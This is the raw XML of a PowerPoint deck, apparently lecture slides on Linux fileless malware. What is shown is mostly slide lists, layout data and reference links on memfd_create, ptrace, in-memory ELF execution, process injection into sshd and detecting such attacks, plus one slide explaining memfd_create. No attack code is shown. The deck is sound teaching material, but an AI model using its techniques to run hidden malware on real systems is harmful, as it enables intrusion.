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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="324" r:id="rId3"/>
    <p:sldId id="323" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="313" r:id="rId6"/>
    <p:sldId id="314" r:id="rId7"/>
    <p:sldId id="315" r:id="rId8"/>
    <p:sldId id="352" r:id="rId9"/>
    <p:sldId id="353" r:id="rId10"/>
    <p:sldId id="354" r:id="rId11"/>
    <p:sldId id="357" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="358" r:id="rId14"/>
    <p:sldId id="359" r:id="rId15"/>
    <p:sldId id="360" r:id="rId16"/>
    <p:sldId id="364" r:id="rId17"/>
    <p:sldId id="365" r:id="rId18"/>
    <p:sldId id="366" r:id="rId19"/>
    <p:sldId id="367" r:id="rId20"/>
    <p:sldId id="373" r:id="rId21"/>
    <p:sldId id="374" r:id="rId22"/>
    <p:sldId id="375" r:id="rId23"/>
    <p:sldId id="376" r:id="rId24"/>
    <p:sldId id="377" r:id="rId25"/>
    <p:sldId id="378" r:id="rId26"/>
    <p:sldId id="379" r:id="rId27"/>
    <p:sldId id="395" r:id="rId28"/>
    <p:sldId id="407" r:id="rId29"/>
    <p:sldId id="400" r:id="rId30"/>
    <p:sldId id="401" r:id="rId31"/>
    <p:sldId id="396" r:id="rId32"/>
    <p:sldId id="397" r:id="rId33"/>
    <p:sldId id="398" r:id="rId34"/>
    <p:sldId id="402" r:id="rId35"/>
    <p:sldId id="399" r:id="rId36"/>
    <p:sldId id="406" r:id="rId37"/>
    <p:sldId id="408" r:id="rId38"/>
    <p:sldId id="409" r:id="rId39"/>
    <p:sldId id="405" r:id="rId40"/>
    <p:sldId id="403" r:id="rId41"/>
    <p:sldId id="404" r:id="rId42"/>
    <p:sldId id="332" r:id="rId43"/>
    <p:sldId id="260" r:id="rId44"/>
    <p:sldId id="326" r:id="rId45"/>
    <p:sldId id="270" r:id="rId46"/>
    <p:sldId id="271" r:id="rId47"/>
    <p:sldId id="272" r:id="rId48"/>
    <p:sldId id="277" r:id="rId49"/>
    <p:sldId id="276" r:id="rId50"/>
    <p:sldId id="280" r:id="rId51"/>
    <p:sldId id="273" r:id="rId52"/>
    <p:sldId id="278" r:id="rId53"/>
    <p:sldId id="261" r:id="rId54"/>
    <p:sldId id="274" r:id="rId55"/>
    <p:sldId id="299" r:id="rId56"/>
    <p:sldId id="300" r:id="rId57"/>
    <p:sldId id="301" r:id="rId58"/>
    <p:sldId id="434" r:id="rId59"/>
    <p:sldId id="435" r:id="rId60"/>
    <p:sldId id="436" r:id="rId61"/>
    <p:sldId id="302" r:id="rId62"/>
    <p:sldId id="303" r:id="rId63"/>
    <p:sldId id="304" r:id="rId64"/>
    <p:sldId id="325" r:id="rId65"/>
    <p:sldId id="431" r:id="rId66"/>
    <p:sldId id="432" r:id="rId67"/>
    <p:sldId id="433" r:id="rId68"/>
    <p:sldId id="372" r:id="rId69"/>
    <p:sldId id="427" r:id="rId70"/>
    <p:sldId id="428" r:id="rId71"/>
    <p:sldId id="429" r:id="rId72"/>
    <p:sldId id="430" r:id="rId73"/>
    <p:sldId id="417" r:id="rId74"/>
    <p:sldId id="418" r:id="rId75"/>
    <p:sldId id="419" r:id="rId76"/>
    <p:sldId id="420" r:id="rId77"/>
    <p:sldId id="421" r:id="rId78"/>
    <p:sldId id="422" r:id="rId79"/>
    <p:sldId id="423" r:id="rId80"/>
    <p:sldId id="424" r:id="rId81"/>
    <p:sldId id="425" r:id="rId82"/>
    <p:sldId id="426" r:id="rId83"/>
    <p:sldId id="410" r:id="rId84"/>
    <p:sldId id="411" r:id="rId85"/>
    <p:sldId id="392" r:id="rId86"/>
    <p:sldId id="393" r:id="rId87"/>
    <p:sldId id="394" r:id="rId88"/>
    <p:sldId id="355" r:id="rId89"/>
    <p:sldId id="371" r:id="rId90"/>
    <p:sldId id="416" r:id="rId91"/>
    <p:sldId id="384" r:id="rId92"/>
    <p:sldId id="385" r:id="rId93"/>
    <p:sldId id="386" r:id="rId94"/>
    <p:sldId id="287" r:id="rId95"/>
    <p:sldId id="322" r:id="rId96"/>
    <p:sldId id="321" r:id="rId97"/>
    <p:sldId id="333" r:id="rId98"/>
    <p:sldId id="437" r:id="rId99"/>
    <p:sldId id="334" r:id="rId100"/>
    <p:sldId id="335" r:id="rId101"/>
    <p:sldId id="336" r:id="rId102"/>
    <p:sldId id="337" r:id="rId103"/>
    <p:sldId id="338" r:id="rId104"/>
    <p:sldId id="339" r:id="rId10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110"/>
    <a:srgbClr val="1A7441"/>
    <a:srgbClr val="66FF66"/>
    <a:srgbClr val="E79FFB"/>
    <a:srgbClr val="CE3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118" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-123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6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BB57FA-2F12-4217-9B5A-220D23BF5427}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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168E3-BEF3-49C9-8766-6B487C31001C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362557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F26B9BD-4362-4286-B3B0-52E8A67F0FFA}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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78A2B153-9C3E-4DB6-B371-DD46BFEEEE01}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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965933D-BF7C-4FC0-97FF-A8B13A94B1B1}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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D8EE2FBA-F984-4270-BB3B-1A04B87175C6}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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2A31EBD-797B-4D7D-8705-7C8B38DAD948}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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9BCDDCDC-17A1-415D-B1E4-381A9E104C7A}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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AE7B1AE5-9A27-4D80-8C98-BD1086B0F93D}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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5DB1AF26-ED92-4295-867E-A962FCC11C53}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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F78A557-EEDD-4B56-A08E-A0A79DE2297F}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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D8E5F0F-18B6-476F-B4C9-B60BEC150E7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3A95A5C-FDAB-49DE-ABC4-EF4B5E792705}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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AA4A08-40E8-43D3-B34E-E4B36E844149}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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3306420-44AC-441E-A54B-AB529CF2D9F3}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/16</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8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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n7.org/linux/man-pages/man2/memfd_create.2.html"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g2.com/articles/what-is-fileless-malware-and-how-attacks-occur"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n7.org/linux/man-pages/man2/memfd_create.2.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gisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itread01.com/content/153043910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vdhrm.wordpress.com/2014/06/10/memfd_create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vdhrm.wordpress.com/2014/06/10/memfd_create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vdhrm.wordpress.com/2014/06/10/memfd_create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tw01.com/IKJHEIJ.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebsd.org/cgi/man.cgi?query=fexecve&amp;sektion=2&amp;n=1"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itw01.com/IKJHEIJ.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myapollo.com.tw/zh-tw/linux-command-n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tw01.com/IKJHEIJ.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hackmd.io/@Drag0nR3b0rn/Byy8nh3r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blog.fbkcs.ru/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ind.ntou.edu.tw/~dada/cgi/Perlsynx.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inux.die.net/man/3/malloc" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/memfd_create.2.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.fbkcs.ru/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/execve.2.html"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blog.fbkcs.ru/elf-in-memory-execu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blog.techbridge.cc/2019/02/01/linux-curl-command-tutoria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tw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.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itw01.com/VJ49AEH.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itread01.com/content/1547948189.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/syscall" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.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perl.plover.com/FAQs/Buffering.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/open" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://n.sfs.tw/content/index/12996" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://topic.alibabacloud.com/tc/a/the-role-of-perl-variables-i-our-local-and-global-variables-_perl_1_40_20291494.html"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itw01.com/VJ49AEH.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agisterquis.github.io/2018/03/31/in-memory-only-elf-execution.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tackoverflow.com/questions/35998268/how-to-break-a-huge-text-file-into-different-lines-every-32-characters-in-one-l" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perl.com/pub/2004/08/09/commandline.html/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/the-diamond-operator" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perltutorial.org/perl-while/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://alvinalexander.com/perl/edu/articles/pl010003.s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perlmaven.com/the-diamond-operator" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/argv-in-per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erlmaven.com/undef-and-defined-in-perl" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/manipulating-perl-arrays" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/the-diamond-operator"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itw01.com/VJ49AEH.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wasp.org/www-community/attacks/Command_Injectio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tw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/exec"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ithelp.ithome.com.tw/articles/10186715"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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an7.org/linux/man-pages/man2/ptrace.2.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an7.org/linux/man-pages/man2/ptrace.2.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an7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/clone.2.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an7.org/linux/man-pages/man2/execve.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/fork.2.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/ptrace.2.html"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an7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fu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wasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Code_Injecti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an7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/waitpid.2.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an7.org/linux/man-pages/man2/ptrace.2.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an7.org/linux/man-pages/man2/ptrace.2.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ibm.com/docs/en/zos/2.1.0?topic=functions-waitpid-wait-specific-child-process-end"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gnu.org/software/libc/manual/html_node/Process-Completion-Status.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nullprogram.com/blog/2016/09/03/"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nullprogram.com/blog/2016/09/03/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/diving-into-proc-pid-me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nullprogram.com/blog/2016/09/03/"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man5/proc.5.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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fu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wasp.org/www-community/attacks/Command_Injection"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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nullprogram.com/blog/2016/09/03/"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man7.org/linux/man-pages/man2/process_vm_readv.2.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man7.org/linux/man-pages/man2/process_vm_writev.2.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stackoverflow.com/questions/66417664/why-does-gdb-allow-writes-to-non-writable-addresses?noredirect=1&amp;lq=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/ptrace.2.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azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-previe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wasp.org/www-community/attacks/Command_Injection"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cybersecurity-help.cz/vdb/SB2018112204" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.alertlogic.com/hc/en-us/articles/360018778412-Metasploit-Hadoop-YARN-ResourceManager-Unauthenticated-Command-Execution" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netscout.com/blog/asert/mirai-not-just-iot-anymore" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.radware.com/security/2018/10/new-demonbot-discovered/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/"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azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/"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linuxhint.com/using_mmap_function_linu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clear.rice.edu/comp321/html/laboratories/lab10/"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man7.org/linux/man-pages/man2/mmap.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man3/errno.3.html"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www.cynet.com/attack-techniques-hands-on/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/"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bleepingcomputer.com/news/security/linux-malware-authors-use-ezuri-golang-crypter-for-zero-detection/"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www.itread01.com/content/1530439100.html"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an7.org/linux/man-pages/man2/memfd_create.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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www.kernel.org/doc/html/latest/admin-guide/mm/concept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an7.org/linux/man-pages/man2/memfd_create.2.html"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dvdhrm.wordpress.com/2014/06/10/memfd_create2/"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linux.die.net/include/sys/types.h" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/include/unistd.h" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/2/ftruncate" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/2/ftruncate"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linux.die.net/man/2/ftruncate"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magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxsecurity.com/features/fileless-malware-on-linux" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askubuntu.com/questions/169495/what-are-run-lock-and-run-shm-used-for" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/372551/how-does-fileless-malware-work-on-linux" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cynet.com/attack-techniques-hands-on/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@sysprog/linux-shared-memory" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://x-c3ll.github.io/posts/fileless-memfd_create/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sandflysecurity.com/blog/detecting-linux-memfd_create-fileless-malware-with-command-line-forensics/"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www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.plesk.com/blog/security-alerts/fileless-attacks-rising/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.spoock.com/2019/08/27/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itw01.com/IKJHEIJ.html"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s://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/6301/how-do-i-read-from-proc-pid-mem-under-linu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www.g2.com/articles/what-is-fileless-malware-and-how-attacks-occu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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"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1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3038331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2708920"/>
            <a:ext cx="8568952" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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a:t>creates an anonymous file and returns a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that refers to it. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, unlike a regular file, it lives in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>RAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and has a volatile backing storage. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>all references to the file are dropped, it is automatically released. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Files Created by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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159520416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100392" y="2799467"/>
            <a:ext cx="756072" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://learn.g2.com/hubfs/fileless-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5578" y="1517803"/>
            <a:ext cx="4472843" cy="4854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05525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101</a:t>
